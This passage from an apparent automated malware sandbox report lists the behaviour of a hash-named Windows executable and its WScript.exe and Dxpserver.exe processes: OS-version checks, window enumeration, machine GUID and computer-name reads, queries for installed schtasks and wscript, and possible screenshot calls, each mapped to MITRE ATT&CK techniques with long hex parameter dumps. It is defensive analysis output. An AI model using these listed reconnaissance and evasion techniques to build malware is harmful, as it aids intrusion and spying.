'hResInfo': '3961720'}\" (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadResource with parameter {'hModule': '3145728', 'hResInfo': '3961544'}\" (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadResource with parameter {'hModule': '3145728', 'hResInfo': '3961736'}\" (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadResource with parameter {'hModule': '3145728', 'hResInfo': '3961528'}\" (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadResource with parameter {'hModule': '0', 'hResInfo': '3961688'}\" (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadResource with parameter {'hModule': '0', 'hResInfo': '3961672'}\" (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadResource with parameter {'hModule': '1847590912', 'hResInfo': '1847767560'}\" (UID: 00000000-00003444)\n \"WScript.exe\" called \"LoadResource with parameter {'hModule': '1787822080', 'hResInfo': '3343888'}\" (UID: 00000000-00003092)\n \"WScript.exe\" called \"LoadResource with parameter {'hModule': '1787822080', 'hResInfo': '3344096'}\" (UID: 00000000-00003092)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb817638529a0000f0fd7f9a5c047700e0fd7f70e8840044f0fd7f00000000400000003f0000001d00000000f0fd7f64e88400c15c047760820b771d00000000f0fd7f9a5c047700e0fd7f88e884005789037780830b7713171d75d8eb8176 (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb8176e88f1e0000f0fd7f9a5c047700b0fd7f98cb150244f0fd7f00000000400000003f0000002000000000f0fd7f8ccb1502c15c047760820b772000000000f0fd7f9a5c047700b0fd7fb0cb15025789037780830b7713171d75d8eb8176 (UID: 00000000-00003032)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003032)\n \"WScript.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100008ced1e0094ed1e003a171d75000000000000000040ee1e000200000000000000000000000c0000000200000001011e00c2eb2675ec5b02774da01c7558020000fc5702770a9f1c7530010000ffffffffdced1e000000000000000000c0ed1e00d8ed1e00010000000000000002000000 (UID: 00000000-00003092)\n \"WScript.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000095e1ff764d441100fefffffff5f60377634d047790a2380010157c6c88087c00b2f4037779af0c7734e41e0000007b6c00007b6c804d04775daf0c77f0000000f0007b6c00000000a0e31e005c00430034e51e00000000000100000004e41e0040f503770000000000000000f0e31e00 (UID: 00000000-00003092)\n \"WScript.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100009c073b000100010040e6f57560e31e0060e31e00245904770000000068e8f575005a3900000000001100000088e31e00575a0477000000000300000002000000000000008800000001000000a0e31e00459df3760000820000000000800000000200000000001f00dc1a7b6cb4e31e00 (UID: 00000000-00003092)\n \"WScript.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000283f0c6c08000000fa3e0c6ca18c5c530200000068420c6c00001f002f180c6cd0a08200c8a08200f8d31e0068420c6cb8d41e00ce850d6c8d674e3ffefffffffa3e0c6c783e0c6c2f180c6c4cd41e001e3e0c6c2f180c6c67c1f37644600e6c68d41e0046420c6c44600e6c00000000 (UID: 00000000-00003092)\n \"WScript.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000f01a126b08000000c41a126bcec35c5202000000d41c126b00001f00e616126be8a18200d8a1820090d51e00d0f0136b50d61e0053af136bc20c5039feffffffc41a126b421a126be616126be4d51e00d91b126be616126b67c1f376ae052075745720750000000000000000cc921c75 (UID: 00000000-00003092)\n \"WScript.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000017000000000000000100030860e61e0044e71e00000000000200000220f13a000c3f0033000000000000000000000000800000000000360050413b00000000002b00002b4028360010423b0088573b0020f13a0058010000000036000400000050413b0050e31e000464037738013600 (UID: 00000000-00003092)\n \"Dxpserver.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb817660f35e000040fd7f9a5c047700f0fd7fb0e546004440fd7f00000000400000003f0000001d0000000040fd7fa4e54600c15c047760820b771d0000000040fd7f9a5c047700f0fd7fc8e546005789037780830b7713171d75d8eb8176 (UID: 00000000-00001212)\n \"Dxpserver.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00001212)\n \"Dxpserver.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb8176e858670000d0fd7f9a5c047700f0fd7f60eb540044d0fd7f00000000400000003f0000001d00000000d0fd7f54eb5400c15c047760820b771d00000000d0fd7f9a5c047700f0fd7f78eb54005789037780830b7713171d75d8eb8176 (UID: 00000000-00005216)\n \"Dxpserver.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005216)\n \"Dxpserver.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb817688ab740000f0fd7f9a5c047700b0fd7f30cb500244f0fd7f00000000400000003f0000002000000000f0fd7f24cb5002c15c047760820b772000000000f0fd7f9a5c047700b0fd7f48cb50025789037780830b7713171d75d8eb8176 (UID: 00000000-00005116)\n \"Dxpserver.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005116)\n \"WScript.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000095e1ff7606b51200fefffffff5f60377634d0477b8a344001015616b88086100b2f403770258377744e626000000606b0000606b804d0477e65b3777f0000000f000606b00000000b0e526005c00430044e72600000000000100000014e6260040f50377000000000000000000e62600 (UID: 00000000-00005492)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003444)\n \"WScript.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003092)\n \"WScript.exe\" called \"GetLocaleInfoA\" with parameter \"1033\" - (UID: 00000000-00003092)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-150", "type": 6, "relevance": 5, "name": "Calls an API typically used to get handle of currently active window", "description": "\"WScript.exe\" called \"GetActiveWindow\" (UID: 00000000-00003092)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-144", "type": 6, "relevance": 3, "name": "Calls an API typically used to open an existing named mutex object", "description": "\"WScript.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00003092)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-39", "type": 1, "relevance": 10, "name": "Makes a code branch decision directly after an API that is environment aware", "description": "Found API call GetLocalTime@KERNEL32.dll directly followed by \"cmp word ptr [esi], 0000h\" and \"je 00465775h\" at 13057-2044-004655FD\n Found API call EnumServicesStatusW@ADVAPI32.dll directly followed by \"cmp dword ptr [ebp-08h], edi\" and \"jbe 0041132Dh\" at 00000000-00005868-40306-440-00411027", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000360033003600350036003400630063003900320065003900360032003300370065003700330033003100610039006300310034003700660031003700370035006100330066003000300065003600380031006600370038003900350036006100300033002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2b037776c79677d8eb8176ac01950000009500000000000000000084006a016a0f000000000000000000000000000000000000850065016a0f00000000000000000000606f950000000000200000000000000000000000 (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000009fa184d70300000074dfd002e9029272a0120000bcdfd002f0ded002590000000300000078ded00280ded00248e0d00260b4fc6abd52bc1afeffffffc8dfd0026fe4fb6a9fa184d7c8dfd0027ce4fb6a0600000000005469010000008fe4fb6a3333ff04060000000e000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002ce0d002000000008e0000007ce0d002feffffff04e0d002cf000477d6000477c2c0c2758e000000470000007ce0d00200000000d8dfd0020000000040e0d002 (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600e24192727cd8d0026d82b075c48d9b0004010000 (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001100feffffff435c037750590377f81f000000200000820cb600800cb60000800700006d95000d000000e806b600ece8d0020464037738019500e06303772ac8c2750000000000009500f006b6006dd12675d3429d716cae3175000000000000000078020000880cb600302f9500010000000000950050019500030000000000000002000000880cb600689db100506c95003f000200010000007e000000020000000000000000000000709db1003f000000010000009075950010000000000000003f000000182cb60034e9d002cc410477880cb60080000000f2030000ff2b0377 (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003032)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003032)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600017857722ce015026d82b075cc5a1e0004010000 (UID: 00000000-00003032)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003600330036003500360034006300630039003200650039003600320033003700650037003300030000000000000002000000908e1e00484b1c00506c1a003200020001000000f40100000a0000000000000000000000504b1c00c20100000900000018711a0005000000000000003200000070961e00d8ca1502cc410477908e1e0028000000fc000000ff2b037717f60775d8eb8176ac011a0000001a0029002f00010000000000fffff905000004000000010000002a002a000100000002000000010000000000000000000000606f1a00f8070000200000000000000000000000 (UID: 00000000-00003032)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600e541577208da15026d82b0759c3f210004010000 (UID: 00000000-00003032)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600e541577208da15026d82b0755441210004010000 (UID: 00000000-00003032)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002100f83b0000ff07000000001a00000000007f070000c4001a00302f1a00ec22000078d9150267e5007700001a00804821000000000000001a00000000008048210000000000982200ba80000000284b2100c4001a00706e2000003b000000001a000000000080482100c010000000001a0078452100f83b0000ff07000000001a00000000007f070000c4001a007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600e541577208da15026d82b0758442210004010000 (UID: 00000000-00003032)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002100f83b0000ff07000000001a00000000007f070000c4001a00302f1a00c622000078d9150267e5007700001a00b04921000000000000001a0000000000b0492100000000007222005080000000584c2100c4001a00706e2000003b000000001a0000000000b0492100c010000000001a00a8462100f83b0000ff07000000001a00000000007f070000c4001a007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600e541577208da15026d82b075b443210004010000 (UID: 00000000-00003032)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002100f83b0000ff07000000001a00000000007f070000c4001a00302f1a00a022000078d9150267e5007700001a00e04a21000000000000001a0000000000e04a2100000000004c22006e80000000884d2100c4001a00706e2000003b000000001a0000000000e04a2100c010000000001a00d8472100f83b0000ff07000000001a00000000007f070000c4001a007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600e541577208da15026d82b075e444210004010000 (UID: 00000000-00003032)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002100f83b0000ff07000000001a00000000007f070000c4001a00302f1a007a22000078d9150267e5007700001a00104c21000000000000001a0000000000104c2100000000002622000480000000b84e2100c4001a00706e2000003b000000001a0000000000104c2100c010000000001a0008492100f83b0000ff07000000001a00000000007f070000c4001a007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600e541577208da15026d82b0750c46210004010000 (UID: 00000000-00003032)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002100f83b0000ff07000000001a00000000007f070000c4001a00302f1a005522000078d9150267e5007700001a00384d21000000000000001a0000000000384d2100000000000122002380000000e04f2100c4001a00706e2000003b000000001a0000000000384d2100c010000000001a00304a2100f83b0000ff07000000001a00000000007f070000c4001a007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600e541577208da15026d82b0753c47210004010000 (UID: 00000000-00003032)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002100f83b0000ff07000000001a00000000007f070000c4001a00302f1a002f22000078d9150267e5007700001a00684e21000000000000001a0000000000684e210000000000db2100fa8000000010512100c4001a00706e2000003b000000001a0000000000684e2100c010000000001a00604b2100f83b0000ff07000000001a00000000007f070000c4001a007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600e541577208da15026d82b0756c48210004010000 (UID: 00000000-00003032)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-152", "type": 6, "relevance": 3, "name": "Calls an API typically used to enumerate active windows", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"EnumWindows\" with parameter \"3953920\" - (UID: 00000000-00003444)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"IsWow64Process\" with parameter \"3444\" - (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"IsWow64Process\" with parameter \"3032\" - (UID: 00000000-00003032)\n \"WScript.exe\" called \"IsWow64Process\" with parameter \"3092\" - (UID: 00000000-00003092)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"WScript.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"GetWindowTextW\" (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"GetWindowTextW\" with parameter \"CiceroUIWndFrame\" - (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"GetWindowTextW\" with parameter \"Start\" - (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"GetWindowTextW\" with parameter \"Network Flyout\" - (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"GetWindowTextW\" with parameter \"Task Switching\" - (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"GetWindowTextW\" with parameter \"Start menu\" - (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"GetWindowTextW\" with parameter \"TF_FloatingLangBar_WndTitle\" - (UID: 00000000-00003444)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00003032)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"GetForegroundWindow\" (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"GetForegroundWindow\" (UID: 00000000-00003032)\n \"WScript.exe\" called \"GetForegroundWindow\" (UID: 00000000-00003092)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-202", "type": 3, "relevance": 3, "name": "Reads system mouse configuration", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\MOUSE\";)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\MOUSE\";)", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")\n \"WScript.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SCHTASKS.EXE\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SCHTASKS.EXE\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\WSCRIPT.EXE\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\WSCRIPT.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1459686874\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1459686874\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"WScript.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1459686874\"\n \"cx\": \"447\"\n \"cy\": \"25\"}\n \"WScript.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"2617311798\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"WScript.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": 